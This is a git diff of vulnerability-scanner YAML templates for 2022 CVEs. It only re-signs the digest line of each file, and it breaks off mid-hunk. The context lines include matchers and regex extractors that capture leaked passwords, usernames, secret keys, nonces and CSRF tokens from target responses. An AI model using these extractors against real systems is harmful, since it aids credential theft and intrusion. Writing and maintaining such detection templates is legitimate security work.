a/http/cves/2022/CVE-2022-25216.yaml +++ b/http/cves/2022/CVE-2022-25216.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203f6ae7c1e6a044dfb0d2128ba0584e801d970fb9556d08d9a0525a2a896768f502202d00ccb4c7597331865d1c3b386225396ccb8816353db36cda136dc03489c824:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205323a679ef9abeed79ff1f82ecb84674929aba02ed11ee2676f47452ee634f2c02204bfdd091f0100710f583e0a2e0755167939999a62dd84a6ee9e6ee75a4c1c14f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index edb2633bde..34dc6a930b 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 401 -# digest: 4a0a00473045022100e86147269d500eee87a76dc8b3d4d6b539f23c5c25293ad044322e223159453702203e3e862ec74768390d0b5445cfb478c43678e1e7109cd2e1d3f97e9bb17fdd90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b1f93640c8017dbc21a9a6aeaf34bd035e2d2d6292c09cb51f9030dcba2fc74b02200e74afbec04cafcb321f4846debadbb1808f5ef0e484f7fca55e2960f8d5c3ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml index 255b0eb855..a987a5e5be 100644 --- a/http/cves/2022/CVE-2022-2535.yaml +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -42,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "searchwp-live-search-result")' condition: and -# digest: 4a0a0047304502205c29befeae02b026b93a42c98ea54d1b6f5efaa102360055dbea4e7481f39b2f022100ad34ac1dc40f5d04fff554cad7674c9ca60fdd3db66a66b792e9e79ff14bca98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce99a810f18c3580dc53dec26f654ec5a94675757e364472d20001b98ca728c4022075bf8b9ccb4a047229ba32d4ca1f30080beffcb0977cae4ffd8d4fda0f321d55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index 3bb3c6a4b9..a863557fae 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207eaf7f3b8339b01fbf9d09efa0a1c48df53a4c44ce469786dd22d682531bb04d022100b158dfc406ffdb342ad75451f95e9b78f8fa9072ec60c97cfcb702e67a2736f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fcd9816f08457977ac3b55c1a3cf825033d2ed8d1c332c96ff28705868e4f650022100dbe371c9acb648faacc3c92bd31b064f53fdbe17b3e46eb0e9595c4deb0bcfd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index 1585e86903..94ca13c528 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -62,4 +62,4 @@ http: regex: - 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"' internal: true -# digest: 4b0a00483046022100b7d06ce856a168a95b454d4325f60f812325ac99d80ba9a9b145c641a5457c16022100c7ea3daf3be143b3953ed74dea7edd703e5b7825a231fba31a84de3c93d919c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220382595b1fe015bbae0d9d442bbc2c4b5365f958a0759d8d73297fb9a2f2b7c6902200aee35dfb62b444bf5135bd6fc42131215628944e655dd93608c908b62a28b4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index 209f223789..d6c5a5d55f 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -55,4 +55,4 @@ http: - 500 - 404 condition: or -# digest: 4a0a004730450220152a665e7b3a3c19077e3bf8a9d5f588afd66692737ed127dea8c823f9a1dd04022100d65ce7ec17220bbd6cfd2f3278886cd52b2f34beaae8509405bcfd1affd9940f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b496345378ef7c5282eccf0ef4750c6c8be7b5d9ead61c0d0e8699049a7a1f6402210099374a6431005d5758183a4b42b31f0edbd2a5764afc3ca59af2ef7e03953fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index 49c1685267..95b25bc235 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -68,4 +68,4 @@ http: regex: - SET avatar = '(.*?)' internal: true -# digest: 480a00453043022053b2e71d759824bf37ef2cafa971723f16645d2288e9f56f34337b2cc04e3522021f2d387dd0cd19bc32b46742661ac827c6e9f2781f7ee711c0df141fc4303737:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a62df045c76e53bf8e6d631a87d8bf926e477a73cbc8494b2dcc7907e1e69ee1022052681e039ce72426d5d56584c8a0281f8e10794b22967d1474b0aefcaa6f2e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index ae416a1bbe..7ef6b61cd8 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ba616440a48cd79fed0fbb82c74d5b423c176fb2058b2a6e108042d3b7e3f6860220327a46e6573a290031f738c2c771cfdb4e8d33eafa4d6bacb46ae741a85abac2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203bd7032118d5c5096703225ebc34ac11a12b2263b1f9933c97278173beb1b586022100c3ce319ef00a2447733d4ac70007351b8fb205432ed35ec8def3c707fae705f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index 9873fbef5f..ca250d4a96 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200e86958e748c94fb8894ce5d8e4ffb93f8142bb6942eda24333c6c89421e8ce00220055ccece3bbea309d872f93ae879a2c5d76a3cac9162862159898803a6a7f9bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c4df5d2066e6268f3acbd183dc87c66c840453a576c416933e1d15f0d828d3c022100a4a86a643deb305983a1eacca72a65d4c2a3cb0b64dafefbdfdcd898c74bc4d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index e0943c18f4..645d854f40 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022058b2345a7931d57a2c005b13d6444c706fd67511a9cfd652adc58a44381d1dd4022100a9b711eeffbbf37010a1f9ac104d9745baab70e7beb8354db4179e48762fd500:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206b88fc37bec53086c40a2dab39585c96a5b146c52946e88686cea2be9f6ddf6002206caa29030300ee31f345d6a9a8dff7b389b4fec4576d174a277b621633d1839b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml index e9d1ab7748..a2ee72f049 100644 --- a/http/cves/2022/CVE-2022-25568.yaml +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c0eb31344ab3448d9fd654d7f0e2b8986db5171ee7fc2614b030cda3446cbcd70220546b8923bf2af5f8e75906a0e4b482a48b43d49e5bd90af2be8c05d0b606f05e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022046f3415c25e4170d3a1e7eafedf7b6545c403151d253702b842924c160136f30022100efa20445934086bb0d0bec0aa8e0d036327507e7b5f662c630e6648262e40f2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 4cd1769995..6cb8ae33eb 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100afd7ffdc412d5cbffebb6acdf1850cbcc2f20ebe9e9b5e56d2573c3e144242fb022100c25d1c6e7cdb06d86355391d4e7fe15b393dc72e717e0c1b998da4bfc729663a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202fbbbb976d8ec173fa0b4b3fc0690cb96e8129fa7ad1ea9dd2f5ab4b958b3ef20220034df02d68653a3be20b73be3ee6bed59e6e53d12887f4a26b9590ce712eaba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index 0b720ebdf2..2e733b9741 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -58,4 +58,4 @@ http: kval: - "x_cmd_response" part: header -# digest: 490a00463044022043923188d8f26d3bad64b5b6194f0d26c0205ef1d053c1e84a0b3122538323a802202d862f6fca847a1e99d6ec7e4b694f266cd8b0409ca139653667b057d5873735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009c4c2bddd8a5eb51b19b59ae34437762eff3249e20f46ff34be84566f6b41ec2022100ec4f8677c9bf0dd38acbd6da055006ca71ba1b7434da22e5cdb9c4fc2c54f15b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index ef8f87f412..1aa280004b 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -50,4 +50,4 @@ http: - type: dsl dsl: - 'location == "/httpvoid.action"' -# digest: 4a0a004730450220422bbf1147e32d7098167fda41b6ebbbab0fb1a33273478a0fe42870a6364d550221009183ec3599722164f7c06a16c6983fbd3faab1b36f05b0913935b8d6339e5f9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100863824d1fc782c5fabc3dea7419d4b3c5b4bcaf83ab4b9fe66594b79ea2209a802204a42e7087082e472a4cc05bab3a0a30dbf881746e790b03855537d4c264dc1aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index e8e00bbee9..96532ca591 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -66,4 +66,4 @@ http: - '"password":"(.*?)"' - '"username":"(.*?)"' - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' -# digest: 4a0a00473045022100b6eaad94ff3878067cbf35ebf2e98041d29ea00cd548a6acc1cebf8170545ff5022011109ec67dc75367e14a57c39726ee1cd3150458963d5a36b4ea0a51e0b68769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a139554a17ea123a9c2e59ac77e260256394de84e1c3b6d88004efe8dd0340da022100f744af2af84e2ab78fc970895b8702d5bc14aa4035a42ef57fbf3094b3c5a6cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml index 9f70167191..ea748b23ee 100644 --- a/http/cves/2022/CVE-2022-26233.yaml +++ b/http/cves/2022/CVE-2022-26233.yaml @@ -44,4 +44,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022100daa8547f82c8615b2d03d8541ff37de1f91c24cf042872c4954ab90b80af5a050220345d77954918025528c4ca7435b98169569b646c348d133e3290273d1c16e42d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c23beee17ba96dc0ff0bbdc4e7172549f786fda33dbfa8ab2e4d40c063b36d402203fd354fae09d18db6b7b35b96a5a3b15e620529582d196bfe0246a76b794c5df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 184bb6a231..5a85695798 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220089ea67dd284fdc9cb5f8561b1d4bfc2fa8b0ba255e1fe4da91db549c933880402206b98099cbbb46f8c4ce87cdf7839a7b3cbd0a01ebb6f36669538d9351f172edd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b4b9c8dfcab221022bb0d4a2727a6b2bae6322db192f2af2a2495c41392c374022040634084bcf37acc6ec71da2bda623a95ee97401d0ff98f888189eb118432ce8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 3020195c6b..88e5a6bcce 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -57,4 +57,4 @@ http: - 'contains(body_2, "CVE-2022-26352")' - 'status_code_2 == 200' condition: and -# digest: 4a0a004730450221009c0b8e26c1757e843516d1eb93bbf57c5a4c28cc367a24ab2913efc1c620261f02203b7f5ecae948b47821751b0eb7531ddf83eceedbcf0ad01c51e5710a9da998bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022006eb8034d180b3eabffdbf06565b45fc69bb1c4450f178265c93beab35ef6080022100f7986c839f4fe16268ddce0e6079a2b747faa6b8491461e1443f0992895f40ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index a5456732af..35c3711134 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cce687826fa0938f4944c77a726102f036638a7225beea50d91d7f4aba881ee4022100d38d31a915a08dd7ac2ccff9c5cdb5683ccf782cc375359389be457f415998d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f494969b3cc5f33d89895aaa1019413558aea5e0a17ad9d8af9c32823b6d5ae022100b8061bac44fe499f3f4c26f9e9ffc65e5876b89124e7fd9c837cde68a62bac3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index 09b54bd0a5..b8894b570b 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008b2b1617febe8dccc10821928bbfc6ef217f8c13d190a4e1331680c32dce97eb02206ef9889f401735822755bfeff09044d1c95a75aaa4f9225590a5d412ec8ef929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c75ba9530d113f2971d361995586fc109d3e1f101ce09dfcff8cb6a9b68200e202206c6367e9f7bc6c8f36edbb155245b907e5a38f00bb3b531b1d42a3bd0c62936b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index 14498c83d0..d4b4996a49 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b51a2dee0a9598c7c1f521f9373c5bb35728dda0693010a4db82ab044f7124d4022006a5200a4741c2b9c8d1102b86fd448d48abe1e0af4e543f0ea00920ed47e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026f3102461fdfb8ad42d0fffcee676354eaeeabe665e8b6057eac540c0f72518022100b5dfbce7dde7ac93f7894809911d03705c9e3046a2ee41a85a93a23fc8fc38fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index eb1dc1072b..082f8d651a 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022067808d2ef89464f8783342be709967c65dd881e44614eb5c38c240f26f031a7c02201f9e9db2f41292d877197f390bc061a2bf455dc58d83e13a92b5baa0612b7cc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206cde04a8da90af417c4d338648289d7fe1dde9782b7a4126776323c0d3214962022100e1f686dceb03fe6c36fcd93c7d212f1c9db005af4dec4dd487ffa5f8512adaf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index 56de6e769d..be6fdc39ce 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -84,4 +84,4 @@ http: regex: - coverupload.(.*?).png internal: true -# digest: 4b0a0048304602210085857e4680115374eb6a9159f4e37003a795b63ad4ad57ea849bb25b04ec899c022100ceac60030e13ddb109cf88cfcaf3066ff8140a87aed39031c9429979c6d07952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d2b0781d5fb5680bd80c25aa75a1d244545d1a91e342d2f00ec8ca3dad09dac7022100ce03a1d3257427eb3be47bc250cad3810df7010fa41412ce1a0046bbc5c4451a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index 0af9290eb8..90e837297d 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022029ff7ca9eec78f978cca636c260d69c4dd0975c46068c8d981049465b985c390022100d935e9c82c8fbb7d5cf9b1a5ffaef6ff36ceb942e8d2df6a703342de6a8c829e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dde3b3f87bc1e1e8b399e7e997452bd588d1da963f0777b7200ab72e3caf202c022100b31c35665d25b79eb84796f8665548dd773109f208318662aa9e311f148c5798:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index 1ee4a12aa3..091d447707 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a1b0cf5101917cedd767e55813f4fda7435be450388a3f0676ddc42e7cb029a5022100db84abf0b399ac4fe86c377eff7301138cc347dfaf7f20244626e67bd02e9945:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b9ed67f3c70c7108d30f3c1f1e2ee437b1987825aafc5fb301c3292ff64dbcf9022075f815b5732c5053302ff69bb0c126ea89d30fcfef401ff095e8daab0aed2a59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml index d37c37737c..d2d35ad63c 100644 --- a/http/cves/2022/CVE-2022-28023.yaml +++ b/http/cves/2022/CVE-2022-28023.yaml @@ -48,4 +48,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "status\":\"success")' condition: and -# digest: 490a0046304402202679435e70ec7ff77e6356d469e8b023129f6b3378ff568e3d494c06c9bd77530220519ab2ca116d285eff6637fc9215b435f91e6d061fdfc904ee37adad8e051fd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1b076f7cdfb320f0d71c0f505593b36b406e9e696bb737f0a0d61388ad61e80022100c896c24e641121b1bff83ab1240ae92d23978d4f6a153271867759af201479fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index 9d865a26ec..0284ea0ab6 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -43,4 +43,4 @@ http: - 'status_code == 200' - 'contains(body, "Page Deleted")' condition: and -# digest: 4b0a0048304602210094d3f24fad25a6ad53537e08fc90fcff2bc0b990b179300cf9ca237b2cb0ddc0022100b1f33b959d642b04732cc8fa792d91295bd120f8cef3e993037a2ebf0ab3665c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022035872b6d7631a79d5c0340f1748e96c6f32bb14452d739b7328ab7569395d7410220522677dc575129449d52db8a8b80bad1a914e1cf674585d5dde9e1a75af21971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index c4d4251323..6b0e2ff255 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100ad3280dd169fc265e15a1fb1734bb88fbfe21000ca36ebab37d25784e71c6416022100a02f6644e9b1a7fd03fc3523742435de169ba87b7c110db223a9010dad57fa2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1785587cac15cd8858bff3c9e18d1cd6abb152301f1ac7f776e5e73c988ed3d02210083e743db669b0cf972fbdb7c27f1c4356e475b32c7ab382254bbe138d7516aa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index 3866b93571..f86a4440bf 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -79,4 +79,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f49180b6302f9fef0412af1682487a99e8e841803be35372ea552f7878da30e022034287c08d99ef3e984b6ba91845fc4b18462d620c01f5ea9326718da215d237f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029c95f4a6b5c8347d8b89c49ffb5e91511ad25e59a2424f916205cfd65c15116022051f90662aff17ed22a874e462509b8be55512460e94d0cdb45b9159ec7b963fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index 72823ef3e3..e2b2ad35dd 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -83,4 +83,4 @@ http: - csrf_token" value="([a-f0-9]{64}) internal: true part: body -# digest: 4b0a00483046022100b936ab16d4511ae94e20920ea423189e833767cd09607b9fd39ae31767758827022100e19df53050f82f76d6172e2c94eb2f93c01f249e4ce37a65a2e05d4c7624ba12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c478d1e0197d2ba9be55f4d0cce98fbfcdecb2638c195874caef03d19fc1e66f02201ab42483cfdd1aa7a57ab5b0886384ed8d16c20ca594c7359976e236b063128e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index 9b756bc315..a1abe5b0a7 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -66,4 +66,4 @@ http: part: body words: - "ManageEngine" -# digest: 4b0a00483046022100adfe043ed717eb4c2bd34e54d594afa7fcd27ffa6a5abaa6d34ae8fe396dcd53022100ad5db93b3daf8c1043b3d88354716768831713fd53728c5fe7d83373dbdca6b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e3d36d51ec843b9dc692e7dee0dc6a720a7809238687406c9b6c9adec2565bd022100f2adb52392fc8ccc65f42b78866b482d716c041de0ba2d986e9fc4bc659f7993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index f5b8472aed..c4c63a5174 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210083399ab30c18aa4ee9e8a8dc77c6a1dc50feb2092036ee0a9fea49eba0c770a4022100aba47004ae87a814261cb712697ce39cb06ac5da29c432abb75c5ec9fac9738c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041e17195389fb0056bcfda90a39dae02b42142afa5777111be172b65a6229c13022100ba206861beb7c0bdb9e3c6fa4f3200001d1bab4257f6242ed471b513864b9198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index 11c85365ba..6eb13e21e4 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009238cd94d4ea391e4ba3a8fd9b6b9e4d2b1b35ea6b4618985cbd7679ba6c26aa022046b75d3e44aef88da8a1c3a43d4d2f499141f72031f265049c0993976f2531de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b622de9ce93ab8761ccb9271542697a6657cc958cf6eb6d5950cbccf9d55d54d0220260b002fb28be7bf8c3cbfd45485e6875a123f7a7f60e1151e124a16fad1456b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index 5ba768a99d..1a65795483 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -64,4 +64,4 @@ http: - '"_ajax_nonce":"([0-9a-z]+)"' internal: true part: body -# digest: 4a0a00473045022100fbf116fc126c32cb636b41b96e4869401ddff061cb73fbccdef08cfaab0c1e8202205d457dcc5c48196ab73bbbe156a7df100c74e1dc1279c0467df579ebe105a8f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b24f378b2c15e4a80c536ce9df05a94c3cabe81bb8e1eb19e344fcff19b3953022100f8e4e6c2e550b6fc7afb7c79ceae5d335310de4900ce7b2fb357c5ea265a0c6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index ece6c2a890..126a2daab7 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022009d76438f14aca1cbc33ea695332b672ebdff31d2dba9171ba069cdf40c9b226022014e620a8fe211c0a70a706c03df6e4bd5961dff7ba59ca7bcb8c2c869e063a28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207de2683e873cdac05f87e487046f2d887d5e63a42e23bfffe37e26eb602daa73022100c4b0f00b4792e8df7ba345ff741ad3745b2196aaf208a0b0cd8760d5a86025b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index b89b7124a5..e20ad71c6a 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d9e1bedfff4118b3279485a5986c26b55fb4f70309678e686a3a2f739891d72402210097dbc2e593923e391651673ae5b43eb1eb8fca5089adec8517b32b625de2b72e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b66799841a5620fc96b4e17cc465b017f69905afc9125aebd6e1c3d2642509f0220700182ede207e46171582ad84a1ae1bcb553d33b160b8f347d0c6d9441057b72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index 60bada6a89..26490063a8 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml @@ -60,4 +60,4 @@ http: - 